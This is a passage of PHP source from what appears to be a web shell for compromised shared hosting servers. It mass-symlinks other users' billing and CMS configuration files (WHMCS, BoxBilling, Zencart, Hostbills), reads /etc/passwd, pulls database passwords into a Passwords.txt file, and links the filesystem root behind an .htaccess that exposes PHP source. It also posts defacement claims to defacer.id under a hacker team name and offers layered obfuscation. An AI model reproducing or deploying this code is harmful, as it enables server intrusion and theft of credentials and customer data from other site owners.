  1733. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1734. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1735. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1736. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1737. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1738. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1739. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1740. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1741. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1742. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1743. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1744. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1749. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1750. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1751. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1752. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1753. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1754. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1755. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1756. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1757. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1758. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1759. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1760. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1761. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1762. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1763. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1764. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1765. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1766. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1767. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1768. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1769. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1770. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1771. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1772. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1773. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1774. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1775. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1776. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1777. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1778. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1779. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1780. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1781. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1782. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1783. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1784. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1785. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1786. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1787. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1788. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1789. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1790. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1791. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1792. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1793. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1794. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1795. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1796. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1797. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1798. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1799. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1800. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1801. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1802. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1803. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1804. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1805. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1806. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1807. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1808. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1809. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1810. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1811. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1812. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1813. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1814. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1815. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1816. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1817. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1818. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1819. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1820. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1821. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1822. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1823. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1824. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1825. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1826. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1827. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1828. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1829. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1830. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1831. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1832. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1833. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1834. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1835. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1836. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1837. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1838. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1839. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1840. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1841. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1842. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1843. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1844. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1845. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1846. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1847. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1848. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1849. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1850. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1851. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1852. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1853. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1854. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1855. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1856. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1857. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1858. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1859. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1860. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1861. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1862. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1863. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1864. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1865. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1866.  
  1867. }
  1868.  
  1869. //password grab
  1870.  
  1871. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  1872. {
  1873.  
  1874. $ar0=explode($marqueurDebutLien, $text);
  1875. $ar1=explode($marqueurFinLien, $ar0[1]);
  1876. $ar=trim($ar1[0]);
  1877. return $ar;
  1878. }
  1879.  
  1880. $ffile=fopen('Passwords.txt','a+');
  1881.  
  1882.  
  1883. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/bct_config2/";
  1884. $re=$r;
  1885. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  1886.  
  1887. $users=file("/etc/passwd");
  1888. foreach($users as $user)
  1889. {
  1890.  
  1891. $str=explode(":",$user);
  1892. $usersss=$str[0];
  1893. foreach($confi as $co)
  1894. {
  1895.  
  1896.  
  1897. $uurl=$re.$usersss.$co;
  1898. $uel=$uurl;
  1899.  
  1900. $ch = curl_init();
  1901.  
  1902. curl_setopt($ch, CURLOPT_URL, $uel);
  1903. curl_setopt($ch, CURLOPT_HEADER, 1);
  1904. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1905. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1906. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  1907. $result['EXE'] = curl_exec($ch);
  1908. curl_close($ch);
  1909. $uxl=$result['EXE'];
  1910.  
  1911.  
  1912. if($uxl && preg_match('/table_prefix/i',$uxl))
  1913. {
  1914.  
  1915. //Wordpress
  1916.  
  1917. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  1918. if(!empty($dbp))
  1919. $pass=$dbp."\n";
  1920. fwrite($ffile,$pass);
  1921.  
  1922. }
  1923. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  1924. {
  1925.  
  1926. //WHMCS
  1927.  
  1928. $dbp=entre2v2($uxl,"db_password = '","';");
  1929. if(!empty($dbp))
  1930. $pass=$dbp."\n";
  1931. fwrite($ffile,$pass);
  1932.  
  1933. }
  1934.  
  1935.  
  1936. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  1937. {
  1938.  
  1939. //Joomla
  1940.  
  1941. $db=entre2v2($uxl,"password = '","';");
  1942. if(!empty($db))
  1943. $pass=$db."\n";
  1944. fwrite($ffile,$pass);
  1945. }
  1946. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  1947. {
  1948.  
  1949. //Vbulletin
  1950.  
  1951. $db=entre2v2($uxl,"password'] = '","';");
  1952. if(!empty($db))
  1953. $pass=$db."\n";
  1954. fwrite($ffile,$pass);
  1955.  
  1956. }
  1957. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  1958. {
  1959.  
  1960. //Other
  1961.  
  1962. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  1963. if(!empty($db))
  1964. $pass=$db."\n";
  1965. fwrite($ffile,$pass);
  1966. }
  1967. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1968. {
  1969.  
  1970. //Other
  1971.  
  1972. $db=entre2v2($uxl,"dbpass = '","';");
  1973. if(!empty($db))
  1974. $pass=$db."\n";
  1975. fwrite($ffile,$pass);
  1976. }
  1977. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1978. {
  1979.  
  1980. //Other
  1981.  
  1982. $db=entre2v2($uxl,"dbpass = '","';");
  1983. if(!empty($db))
  1984. $pass=$db."\n";
  1985. fwrite($ffile,$pass);
  1986.  
  1987. }
  1988. elseif($uxl && preg_match('/dbpass/i',$uxl))
  1989. {
  1990.  
  1991. //Other
  1992.  
  1993. $db=entre2v2($uxl,"dbpass = \"","\";");
  1994. if(!empty($db))
  1995. $pass=$db."\n";
  1996. fwrite($ffile,$pass);
  1997. }
  1998.  
  1999.  
  2000. }
  2001. }
  2002. echo "<center>
  2003. <a href=\"bct_config2/root/\">Root Server</a>
  2004. <br><a href=\"bct_config2/Passwords.txt\">Passwords</a>
  2005. <br><a href=\"bct_config2/\">Configurations</a></center>";
  2006. }
  2007. else
  2008. {
  2009. echo "<center>
  2010. <form method=\"POST\">
  2011. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2012. $file = '/etc/passwd';
  2013. $read = @fopen($file, 'r');
  2014. if ($read){
  2015. $body = @fread($read, @filesize($file));
  2016. echo "".htmlentities($body)."";
  2017. }
  2018. elseif(!$read)
  2019. {
  2020. $read = @show_source($file) ;
  2021. }
  2022. elseif(!$read)
  2023. {
  2024. $read = @highlight_file($file);
  2025. }
  2026. elseif(!$read)
  2027. {
  2028. for($uid=0;$uid<1000;$uid++)
  2029. {
  2030. $ara = posix_getpwuid($uid);
  2031. if (!empty($ara))
  2032. {
  2033. while (list ($key, $val) = each($ara))
  2034. {
  2035. print "$val:";
  2036. }
  2037. print "\n";
  2038. }}}
  2039.  
  2040. flush();
  2041.  
  2042. echo "</textarea>
  2043. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2044. </form></center>";
  2045. }
  2046. }
  2047. }
  2048. elseif($_GET['do'] == 'symlink') {
  2049. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2050. $d0mains = @file("/etc/named.conf");
  2051. ##httaces
  2052. if($d0mains){
  2053. @mkdir("bct_isine",0777);
  2054. @chdir("bct_isine");
  2055. @exe("ln -s / root");
  2056. $file3 = 'Options Indexes FollowSymLinks
  2057. DirectoryIndex bct.htm
  2058. AddType text/plain .php
  2059. AddHandler text/plain .php
  2060. Satisfy Any';
  2061. $fp3 = fopen('.htaccess','w');
  2062. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2063. echo "
  2064. <table align=center border=1 style='width:60%;border-color:#333333;'>
  2065. <tr>
  2066. <td align=center><font size=2>S. No.</font></td>
  2067. <td align=center><font size=2>Domains</font></td>
  2068. <td align=center><font size=2>Users</font></td>
  2069. <td align=center><font size=2>Symlink</font></td>
  2070. </tr>";
  2071. $dcount = 1;
  2072. foreach($d0mains as $d0main){
  2073. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2074. flush();
  2075. if(strlen(trim($domains[1][0])) > 2){
  2076. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2077. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  2078. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  2079. <td>".$user['name']."</td>
  2080. <td><a href='$full/bct_isine/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  2081. flush();
  2082. $dcount++;}}}
  2083. echo "</table>";
  2084. }else{
  2085. $TEST=@file('/etc/passwd');
  2086. if ($TEST){
  2087. @mkdir("bct_isine",0777);
  2088. @chdir("bct_isine");
  2089. exe("ln -s / root");
  2090. $file3 = 'Options Indexes FollowSymLinks
  2091. DirectoryIndex bct.htm
  2092. AddType text/plain .php
  2093. AddHandler text/plain .php
  2094. Satisfy Any';
  2095.  $fp3 = fopen('.htaccess','w');
  2096.  $fw3 = fwrite($fp3,$file3);
  2097.  @fclose($fp3);
  2098.  echo "
  2099. <table align=center border=1><tr>
  2100. <td align=center><font size=3>S. No.</font></td>
  2101. <td align=center><font size=3>Users</font></td>
  2102. <td align=center><font size=3>Symlink</font></td></tr>";
  2103.  $dcount = 1;
  2104.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  2105.  while(!feof($file)){
  2106.  $s = fgets($file);
  2107.  $matches = array();
  2108.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  2109.  $matches = str_replace("home/","",$matches[1]);
  2110.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2111.  continue;
  2112.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2113. <td align=center><font class=txt>" . $matches . "</td>";
  2114.  echo "<td align=center><font class=txt><a href=$full/bct_isine/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2115.  $dcount++;}fclose($file);
  2116.  echo "</table>";}else{if($os != "Windows"){@mkdir("bct_isine",0777);@chdir("bct_isine");@exe("ln -s / root");$file3 = '
  2117. Options Indexes FollowSymLinks
  2118. DirectoryIndex bct.htm
  2119. AddType text/plain .php
  2120. AddHandler text/plain .php
  2121. Satisfy Any
  2122. ';
  2123.  $fp3 = fopen('.htaccess','w');
  2124.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2125.  echo "
  2126. <div class='mybox'><br>
  2127. <table align=center border=1><tr>
  2128. <td align=center><font size=3>ID</font></td>
  2129. <td align=center><font size=3>Users</font></td>
  2130. <td align=center><font size=3>Symlink</font></td></tr>";
  2131.  $temp = "";$val1 = 0;$val2 = 1000;
  2132.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  2133.  if ($uid)$temp .= join(':',$uid)."\n";}
  2134.  echo '<br/>';$temp = trim($temp);$file5 =
  2135.  fopen("test.txt","w");
  2136.  fputs($file5,$temp);
  2137.  fclose($file5);$dcount = 1;$file =
  2138.  fopen("test.txt", "r") or exit("Unable to open file!");
  2139.  while(!feof($file)){$s = fgets($file);$matches = array();
  2140.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  2141.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2142.  continue;
  2143.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2144. <td align=center><font class=txt>" . $matches . "</td>";
  2145.  echo "<td align=center><font class=txt><a href=$full/bct_isine/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2146.  $dcount++;}
  2147.  fclose($file);
  2148.  echo "</table></div></center>";unlink("test.txt");
  2149.  } else
  2150.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  2151.  }
  2152.  }
  2153.  }
  2154.  elseif($_GET['do'] == 'defacerid') {
  2155. echo "<br><center><form method='post'>
  2156.         <u>Defacer</u>: <br>
  2157.         <input type='text' name='hekel' size='50' value='BlackhatCode'><br>
  2158.         <u>Team</u>: <br>
  2159.         <input type='text' name='tim' size='50' value='Bima Cyber Team'><br>
  2160.         <u>Domains</u>: <br>
  2161.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2162.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2163.         </form>";
  2164. $site = explode("\r\n", $_POST['sites']);
  2165. $go = $_POST['go'];
  2166. $hekel = $_POST['hekel'];
  2167. $tim = $_POST['tim'];
  2168. if($go) {
  2169. foreach($site as $sites) {
  2170. $zh = $sites;
  2171. $form_url = "https://www.defacer.id/notify";
  2172. $data_to_post = array();
  2173. $data_to_post['attacker'] = "$hekel";
  2174. $data_to_post['team'] = "$tim";
  2175. $data_to_post['poc'] = 'SQL Injection';
  2176. $data_to_post['url'] = "$zh";
  2177. $curl = curl_init();
  2178. curl_setopt($curl,CURLOPT_URL, $form_url);
  2179. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2180. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2181. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2182. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2183. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2184. $result = curl_exec($curl);
  2185. echo $result;
  2186. curl_close($curl);
  2187. echo "<br>";
  2188. }
  2189. }
  2190. }
  2191. elseif($_GET['do'] == 'encode') {
  2192. echo '<form method="post">';
  2193. echo '<textarea class="inputz" cols=80 rows=10 name="code"></textarea><br><br>';
  2194. echo '<center><select class="inputz" size="1" name="ope">';
  2195. echo '<option value="URLencode">URL</option>';
  2196. echo '<option value="base64">Base64</option>';
  2197. echo '<option value="ur">convert_uu</option>';
  2198. echo '<option value="gzinflates">gzinflate - base64</option>';
  2199. echo '<option value="str2">str_rot13 - base64</option>';
  2200. echo '<option value="gzpress">gzcompress - base64</option>';
  2201. echo '<option value="gzinflate">str_rot13 - gzinflate - base64</option>';
  2202. echo '<option value="gzinflater">gzinflate - str_rot13 - base64</option>';
  2203. echo '<option value="gzinflatex">gzinflate - str_rot13 - gzinflate - base64</option>';
  2204. echo '<option value="gzinflatew">str_rot13 - convert_uu - URL - gzinflate - str_rot13 - base64 - convert_uu - gzinflate - URL - str_rot13 - gzinflate - base64</option>';
  2205. echo '<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>';
  2206. echo '<option value="URL">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>';
  2207. echo '</select>&nbsp;&nbsp;<input class="inputzbut" type="submit" name="submit" value="Encode">';
  2208. echo '&nbsp;&nbsp;<input class="inputzbut" type="submit" name="submits" value="Decode"></center>';
  2209. echo '</form>';
  2210.  
  2211. $submit = $_POST['submit'];
  2212. if (isset($submit)){
  2213. $op = $_POST["ope"];
  2214. switch ($op) {case 'base64': $codi=base64_encode($text);
  2215. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  2216. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  2217. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  2218. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  2219. break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawURLencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawURLdecode(str_rot13($text))))))))))));
  2220. break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
  2221. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  2222. break;case 'URLencode' : $codi=rawURLencode($text);
  2223. break;case 'ur' : $codi=convert_uuencode($text);
  2224. break;case 'URL' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  2225. break;case 'gzpress' : $codi=base64_encode(gzcompress($text));
  2226. break;default:break;}}
  2227.  
  2228. $submit = $_POST['submits'];
  2229. if (isset($submit)){
  2230. $op = $_POST["ope"];
  2231. switch ($op) {case 'base64': $codi=base64_decode($text);
  2232. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  2233. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  2234. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  2235. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  2236. break;case 'gzinflatew' : $codi=str_rot13(rawURLdecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawURLdecode(str_rot13(gzinflate(base64_decode($text))))))))))));
  2237. break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
  2238. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  2239. break;case 'URLencode' : $codi=rawURLdecode($text);
  2240. break;case 'ur' : $codi=convert_uudecode($text);
  2241. break;case 'URL' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  2242. break;case 'gzpress' : $codi=gzuncompress(base64_decode($text));
  2243. break;default:break;}}
  2244. $html = htmlentities(stripslashes($codi));
  2245. echo "<from><textarea cols=80 rows=10 class='inputz' readonly>".$html."</textarea></from>";
  2246. }
  2247. elseif($_GET['do'] == 'self') {
